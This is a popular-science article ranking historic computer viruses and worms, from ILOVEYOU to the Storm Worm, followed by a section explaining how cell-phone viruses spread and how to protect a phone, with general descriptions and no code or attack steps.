According to anti-virus software producer McAfee, the ILOVEYOU virus had a wide range of attacks:
It copied itself several times and hid the copies in several folders on the victim's hard drive.
It added new files to the victim's registry keys.
It replaced several different kinds of files with copies of itself.
It sent itself through Internet Relay Chat clients as well as e-mail.
It downloaded a file called WIN-BUGSFIX.EXE from the Internet and executed it. Rather than fix bugs, this program was a password-stealing application that e-mailed secret information to the hacker's e-mail address.
Who created the ILOVEYOU virus? Some think it was Onel de Guzman of the Philippines. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damages .
Gotcha!
As if viruses, worms and Trojan horses weren't enough, we also have to worry about virus hoaxes. These are fake viruses -- they don't actually cause any harm or replicate themselves. Instead, the creators of these viruses hope that people and media companies treat the hoax as if it were the real deal. Even though these hoaxes aren't immediately dangerous, they are still a problem. Like the boy who cried wolf, hoax viruses can cause people to ignore warnings about real threats.
Now that the love fest is over, let's take a look at one of the most widespread viruses to hit the Web.
Worst Computer Virus 8: “ The Klez Virus “
Joe Raedle/Getty Images
The Klez virus marked a new direction for computer viruses, setting the bar high for those that would follow. It debuted in late 2001, and variations of the virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful programs that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool.
Shortly after it appeared on the Internet, hackers modified the Klez virus in a way that made it far more effective. Like other viruses, it could comb through a victim's address book and send itself to contacts. But it could also take another name from the contact list and place that address in the "From" field in the e-mail client. It's called spoofing -- the e-mail appears to come from one source when it's really coming from somewhere else.
Spoofing an e-mail address accomplishes a couple of goals. For one thing, it doesn't do the recipient of the e-mail any good to block the person in the "From" field, since the e-mails are really coming from someone else. A Klez worm programmed to spam people with multiple e-mails could clog an inbox in short order, because the recipients would be unable to tell what the real source of the problem was. Also, the e-mail's recipient might recognize the name in the "From" field and therefore be more receptive to opening it.
Antivirus Software
It's important to have an antivirus program on your computer, and to keep it up to date. But you shouldn't use more than one suite, as multiple antivirus programs can interfere with one another. Here's a list of some antivirus software suites:
Avast Antivirus
AVG Anti-Virus
Kaspersky Anti-Virus
McAfee VirusScan
Norton AntiVirus
Several major computer viruses debuted in 2001. In the next section, we'll take a look at Code Red.
Worst Computer Virus 7: “ Code Red and Code Red II ”
Chris Hondros/Getty Images
The Code Red and Code Red II worms popped up in the summer of 2001. Both worms exploited an operating system vulnerability that was found in machines running Windows 2000 and Windows NT. The vulnerability was a buffer overflow problem, which means when a machine running on these operating systems receives more information than its buffers can handle, it starts to overwrite adjacent memory.
The original Code Red worm initiated a distributed denial of service (DDoS) attack on the White House. That means all the computers infected with Code Red tried to contact the Web servers at the White House at the same time, overloading the machines.
A Windows 2000 machine infected by the Code Red II worm no longer obeys the owner. That's because the worm creates a backdoor into the computer's operating system, allowing a remote user to access and control the machine. In computing terms, this is a system-level compromise, and it's bad news for the computer's owner. The person behind the virus can access information from the victim's computer or even use the infected computer to commit crimes. That means the victim not only has to deal with an infected computer, but also may fall under suspicion for crimes he or she didn't commit.
While Windows NT machines were vulnerable to the Code Red worms, the viruses' effect on these machines wasn't as extreme. Web servers running Windows NT might crash more often than normal, but that was about as bad as it got. Compared to the woes experienced by Windows 2000 users, that's not so bad.
Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.
What do I do now?
What should you do if you find out your computer has been hit with a computer virus? That depends on the virus. Many antivirus programs are able to remove viruses from an infected system. But if the virus has damaged some of your files or data, you'll need to restore from backups. It's very important to back up your information often. And with viruses like the Code Red worms, it's a good idea to completely reformat the hard drive and start fresh. Some worms allow other malicious software to load onto your machine, and a simple antivirus sweep might not catch them all.
Worst Computer Virus 6: Nimda
Another virus to hit the Internet in 2001 was the Nimda (which is admin spelled backwards) worm. Nimda spread through the Internet rapidly, becoming the fastest propagating computer virus at that time. In fact, according to TruSecure CTO Peter Tippett, it only took 22 minutes from the moment Nimda hit the Internet to reach the top of the list of reported attacks.
The Nimda worm's primary targets were Internet servers. While it could infect a home PC, its real purpose was to bring Internet traffic to a crawl. It could travel through the Internet using multiple methods, including e-mail. This helped spread the virus across multiple servers in record time.
The Nimda worm created a backdoor into the victim's operating system. It allowed the person behind the attack to access the same level of functions as whatever account was logged into the machine currently. In other words, if a user with limited privileges activated the worm on a computer, the attacker would also have limited access to the computer's functions. On the other hand, if the victim was the administrator for the machine, the attacker would have full control.
The spread of the Nimda virus caused some network systems to crash as more of the system's resources became fodder for the worm. In effect, the Nimda worm became a distributed denial of service (DDoS) attack.
Phoning it In
Not all computer viruses focus on computers. Some target other electronic devices. Here's just a small sample of some highly portable viruses:
CommWarrior attacked smartphones running the Symbian operating system (OS).
The Skulls Virus also attacked Symbian phones and displayed screens of skulls instead of a home page on the victims' phones.
RavMonE.exe is a virus that could infect iPod MP3 devices made between Sept. 12, 2006, and Oct. 18, 2006.
Fox News reported in March 2008 that some electronic gadgets leave the factory with viruses pre-installed -- these viruses attack your computer when you sync the device with your machine .
Worst Computer Virus 5: “ SQL Slammer/Sapphire “
Chung Sung-Jun/Getty Images
In late January 2003, a new Web server virus spread across the Internet. Many computer networks were unprepared for the attack, and as a result the virus brought down several important systems. The Bank of America's ATM service crashed, the city of Seattle suffered outages in 911 service and Continental Airlines had to cancel several flights due to electronic ticketing and check-in errors.
The culprit was the SQL Slammer virus, also known as Sapphire. By some estimates, the virus caused more than $1 billion in damages before patches and antivirus software caught up to the problem [source: Lemos]. The progress of Slammer's attack is well documented. Only a few minutes after infecting its first Internet server, the Slammer virus was doubling its number of victims every few seconds. Fifteen minutes after its first attack, the Slammer virus infected nearly half of the servers that act as the pillars of the Internet.
The Slammer virus taught a valuable lesson: It's not enough to make sure you have the latest patches and antivirus software. Hackers will always look for a way to exploit any weakness, particularly if the vulnerability isn't widely known. While it's still important to try and head off viruses before they hit you, it's also important to have a worst-case-scenario plan to fall back on should disaster strike.
A Matter of Timing
Some hackers program viruses to sit dormant on a victim's computer only to unleash an attack on a specific date. Here's a quick sample of some famous viruses that had time triggers:
The Jerusalem virus activated every Friday the 13th to destroy data on the victim computer's hard drive
The Michelangelo virus activated on March 6, 1992 -- Michelangelo was born on March 6, 1475
The Chernobyl virus activated on April 26, 1999 -- the 13th anniversary of the Chernobyl meltdown disaster
The Nyxem virus delivered its payload on the third of every month, wiping out files on the victim's computer
Worst Computer Virus 4: “ MyDoom “
Alex Wong/Getty Images
The MyDoom (or Novarg) virus is another worm that can create a backdoor in the victim computer's operating system. The original MyDoom virus -- there have been several variants -- had two triggers. One trigger caused the virus to begin a denial of service (DoS) attack starting Feb. 1, 2004. The second trigger commanded the virus to stop distributing itself on Feb. 12, 2004. Even after the virus stopped spreading, the backdoors created during the initial infections remained active .
Later that year, a second outbreak of the MyDoom virus gave several search engine companies grief. Like other viruses, MyDoom searched victim computers for e-mail addresses as part of its replication process. But it would also send a search request to a search engine and use e-mail addresses found in the search results. Eventually, search engines like Google began to receive millions of search requests from corrupted computers. These attacks slowed down search engine services and even caused some to crash .
MyDoom spread through e-mail and peer-to-peer networks. According to the security firm MessageLabs, one in every 12 e-mail messages carried the virus at one time. Like the Klez virus, MyDoom could spoof e-mails so that it became very difficult to track the source of the infection.
Oddball Viruses
Not all viruses cause severe damage to computers or destroy networks. Some just cause computers to act in odd ways. An early virus called Ping-Pong created a bouncing ball graphic, but didn't seriously damage the infected computer. There are several joke programs that might make a computer owner think his or her computer is infected, but they're really harmless applications that don't self-replicate. When in doubt, it's best to let an antivirus program remove the application.
Worst Computer Virus 3: “Sasser and Netsky“
David Hecker/AFP/Getty Images
Sometimes computer virus programmers escape detection. But once in a while, authorities find a way to track a virus back to its origin. Such was the case with the Sasser and Netsky viruses. A 17-year-old German named Sven Jaschan created the two programs and unleashed them onto the Internet. While the two worms behaved in different ways, similarities in the code led security experts to believe they both were the work of the same person.
The Sasser worm attacked computers through a Microsoft Windows vulnerability. Unlike other worms, it didn't spread through e-mail. Instead, once the virus infected a computer, it looked for other vulnerable systems. It contacted those systems and instructed them to download the virus. The virus would scan random IP addresses to find potential victims. The virus also altered the victim's operating system in a way that made it difficult to shut down the computer without cutting off power to the system.
The Netsky virus moves through e-mails and Windows networks. It spoofs e-mail addresses and propagates through a 22,016-byte file attachment . As it spreads, it can cause a denial of service (DoS) attack as systems collapse while trying to handle all the Internet traffic. At one time, security experts at Sophos believed Netsky and its variants accounted for 25 percent of all computer viruses on the Internet .
Sven Jaschan spent no time in jail; he received a sentence of one year and nine months of probation. Because he was under 18 at the time of his arrest, he avoided being tried as an adult in German courts.
Black Hats
Just as you'd find good and bad witches in Oz, you can find good and bad hackers in our world. One common term for a hacker who sets out to create computer viruses or compromise system security is a black hat. Some hackers attend conventions like the Black Hat conference or Defcon to discuss the impact of black hats and how they use vulnerabilities in computer security systems to commit crimes.
So far, most of the viruses we've looked at target PCs running Windows. But Macintosh computers aren't immune to computer virus attacks. In the next section, we'll take a look at the first virus to commit a Mac attack.
Worst Computer Virus 2: ” Leap-A/Oompa-A ”
Kevin Mazur Archive 1/WireImage/Getty Images
Maybe you've seen the ad in Apple's Mac computer marketing campaign where Justin "I'm a Mac" Long consoles John "I'm a PC" Hodgman. Hodgman comes down with a virus and points out that there are more than 100,000 viruses that can strike a computer. Long says that those viruses target PCs, not Mac computers.
For the most part, that's true. Mac computers are partially protected from virus attacks because of a concept called security through obscurity. Apple has a reputation for keeping its operating system (OS) and hardware a closed system -- Apple produces both the hardware and the software. This keeps the OS obscure. Traditionally, Macs have been a distant second to PCs in the home computer market. A hacker who creates a virus for the Mac won't hit as many victims as he or she would with a virus for PCs.
But that hasn't stopped at least one Mac hacker. In 2006, the Leap-A virus, also known as Oompa-A, debuted. It uses the iChat instant messaging program to propagate across vulnerable Mac computers. After the virus infects a Mac, it searches through the iChat contacts and sends a message to each person on the list. The message contains a corrupted file that appears to be an innocent JPEG image.
The Leap-A virus doesn't cause much harm to computers, but it does show that even a Mac computer can fall prey to malicious software. As Mac computers become more popular, we'll probably see more hackers create customized viruses that could damage files on the computer or snarl network traffic. Hodgman's character may yet have his revenge.
Breaking into Song
While computer viruses can pose a serious threat to computer systems and Internet traffic, sometimes the media overstates the impact of a particular virus. For example, the Michelangelo virus gained a great deal of media attention, but the actual damage caused by the virus was pretty small. That might have been the inspiration for the song "Virus Alert" by "Weird Al" Yankovic. The song warns listeners of a computer virus called Stinky Cheese that not only wipes out your computer's hard drive, but also forces you to listen to Jethro Tull songs and legally change your name to Reggie.
Worst Computer Virus 1: “ Storm Worm ”
The latest virus on our list is the dreaded Storm Worm. It was late 2006 when computer security experts first identified the worm. The public began to call the virus the Storm Worm because one of the e-mail messages carrying the virus had as its subject "230 dead as storm batters Europe." Antivirus companies call the worm other names. For example, Symantec calls it Peacomm while McAfee refers to it as Nuwar. This might sound confusing, but there's already a 2001 virus called the W32.Storm.Worm. The 2001 virus and the 2006 worm are completely different programs.
Gabriel Bouys/AFP/Getty Images
The Storm Worm is a Trojan horse program. Its payload is another program, though not always the same one. Some versions of the Storm Worm turn computers into zombies or bots. As computers become infected, they become vulnerable to remote control by the person behind the attack. Some hackers use the Storm Worm to create a botnet and use it to send spam mail across the Internet.
Many versions of the Storm Worm fool the victim into downloading the application through fake links to news stories or videos. The people behind the attacks will often change the subject of the e-mail to reflect current events. For example, just before the 2008 Olympics in Beijing, a new version of the worm appeared in e-mails with subjects like "a new deadly catastrophe in China" or "China's most deadly earthquake." The e-mail claimed to link to video and news stories related to the subject, but in reality clicking on the link activated a download of the worm to the victim's computer [source: McAfee].
Several news agencies and blogs named the Storm Worm one of the worst virus attacks in years. By July 2007, an official with the security company Postini claimed that the firm detected more than 200 million e-mails carrying links to the Storm Worm during an attack that spanned several days [source: Gaudin]. Fortunately, not every e-mail led to someone downloading the worm.
Although the Storm Worm is widespread, it's not the most difficult virus to detect or remove from a computer system. If you keep your antivirus software up to date and remember to use caution when you receive e-mails from unfamiliar people or see strange links, you'll save yourself some major headaches.
Malware
Computer viruses are just one kind of malware. Other types include spyware and some kinds of adware. Spyware spies on what a user does with his or her computer. That can include logging keystrokes as a way to discover login codes and passwords. Adware is a software app that displays ads to users while they use a larger application like a Web browser. Some adware contains code that gives advertisers extensive access to private information.
CELL PHONE VIRUS
12. Cell-phone Virus
12.1 BASICS
That Thing with Paris Hilton's Phone Remember when someone got his hands on Paris Hilton's star-studded contact list? It was not the result of a virus, and nobody hacked into Hilton's phone. Mobile phone servers hold on to certain types of information, such as contact lists (in case the user's phone locks up) and recent calls (for billing purposes). The enterprising hacker got into T-mobile's servers and stole the information from there. |
A cell-phone virus is basically the same thing as a computer virus -- an unwanted executable file that "infects" a device and then copies itself to other devices. But whereas a computer virus or worm spreads through e-mail attachments and Internet downloads, a cell-phone virus or worm spreads via Internet downloads, MMS (multimedia messaging service) attachments and Bluetooth transfers. The most common type of cell-phone infection right now occurs when a cell phone downloads an infected file from a PC or the Internet, but phone-to-phone viruses are on the rise.
Current phone-to-phone viruses almost exclusively infect phones running the Symbian operating system. The large number of proprietary operating systems in the cell-phone world is one of the obstacles to mass infection. Cell-phone-virus writers have no Windows-level marketshare to target, so any virus will only affect a small percentage of phones.
Infected files usually show up disguised as applications like games, security patches, add-on functionalities and, of course, pornography and free stuff. Infected text messages sometimes steal the subject line from a message you've received from a friend, which of course increases the likelihood of your opening it -- but opening the message isn't enough to get infected. You have to choose to open the message attachment and agree to install the program, which is another obstacle to mass infection: To date, no reported phone-to-phone virus auto-installs. The installation obstacles and the methods of spreading limit the amount of damage the current generation of cell-phone virus can do.
12.2 How They Spread
|
Phones that can only make and receive calls are not at risk. Only smartphones with a Bluetooth connection and data capabilities can receive a cell-phone virus. These viruses spread primarily in three ways:
Internet downloads - The virus spreads the same way a traditional computer virus does. The user downloads an infected file to the phone by way of a PC or the phone's own Internet connection. This may include file-sharing downloads, applications available from add-on sites (such as ringtones or games) and false security patches posted on the Symbian Web site.
Bluetooth wireless connection - The virus spreads between phones by way of their Bluetooth connection. The user receives a virus via Bluetooth when the phone is in discoverable mode, meaning it can be seen by other Bluetooth-enabled phones. In this case, the virus spreads like an airborne illness. According to TechnologyReview.com, cell-phone-virus researchers at F-Secure's U.S. lab now conduct their studies in a bomb shelter so their research topics don't end up spreading to every Bluetooth-enabled phone in the vicinity.
Multimedia Messaging Service - The virus is an attachment to an MMS text message. As with computer viruses that arrive as e-mail attachments, the user must choose to open the attachment and then install it in order for the virus to infect the phone. Typically, a virus that spreads via MMS gets into the phone's contact list and sends itself to every phone number stored there.
In all of these transfer methods, the user has to agree at least once (and usually twice) to run the infected file. But cell-phone-virus writers get you to open and install their product the same way computer-virus writers do: The virus is typically disguised as a game, security patch or other desirable application.
12.3 The Damage Done
The first known cell-phone virus, Cabir, is entirely innocuous. All it does is sit in the phone and try to spread itself. Other cell-phone viruses, however, are not as harmless.
A virus might access and/or delete all of the contact information and calendar entries in your phone. It might send an infected MMS message to every number in your phone book -- and MMS messages typically cost money to send, so you're actually paying to send a virus to all of your friends, family members and business associates. On the worst-case-scenario end, it might delete or lock up certain phone applications or crash your phone completely so it's useless. Some reported viruses and their vital statistics are listed below.
Cell-phone Viruses Cabir.A
Skulls.A
Commwarrior.A
Locknut.B
Fontal.A
|
The Commwarrior virus arrived on the scene in January 2005 and is the first cell-phone virus to effectively spread through an entire company via Bluetooth (see ComputerWorld.com: Phone virus spreads through Scandinavian company). It replicates by way of both Bluetooth and MMS. Once you receive and install the virus, it immediately starts looking for other Bluetooth phones in the vicinity to infect. At the same time, the virus sends infected MMS messages to every phone number in your address list. Commwarrior is probably one of the more effective viruses to date because it uses two methods to replicate itself.
12.4 Protecting Your Phone
The best way to protect yourself from cell-phone viruses is the same way you protect yourself from computer viruses: Never open anything if you don't know what it is, haven't requested it or have any suspicions whatsoever that it's not what it claims to be. That said, even the most cautious person can still end up with an infected phone. Here are some steps you can take to decrease your chances of installing a virus:
Turn off Bluetooth discoverable mode. Set your phone to "hidden" so other phones can't detect it and send it the virus. You can do this on the Bluetooth options screen.
Check security updates to learn about filenames you should keep an eye out for. It's not fool-proof -- the Commwarrior program generates random names for the infected files it sends out, so users can't be warned not to open specific filenames -- but many viruses can be easily identified by the filenames they carry. Security sites with detailed virus information include:
Some of these sites will send you e-mail updates with new virus information as it gets posted.
Install some type of security software on your phone. Numerous companies are developing security software for cell phones, some for free download, some for user purchase and some intended for cell-phone service providers. The software may simply detect and then remove the virus once it's received and installed, or it may protect your phone from getting certain viruses in the first place. Symbian has developed an anti-virus version of its operating system that only allows the phone's Bluetooth connection to accept secure files.
Although some in the cell-phone industry think the potential problem is overstated, most experts agree that cell-phone viruses are on the brink of their destructive power. Installing a "security patch" that ends up turning your phone into a useless piece of plastic is definitely something to be concerned about, but it could still get worse. Future possibilities include viruses that bug phones -- so someone can see every number you call and listen to your conversations -- and viruses that steal financial information, which would be a serious issue if smartphones end up being used as payment devices (see Bankrate.com: Paying by cell phone on the way). Ultimately, more connectivity means more exposure to viruses and faster spreading of infection. As smartphones become more common and more complex, so will the viruses that target them.
For more information on cell-phone viruses and related topics, check out the links on the next page.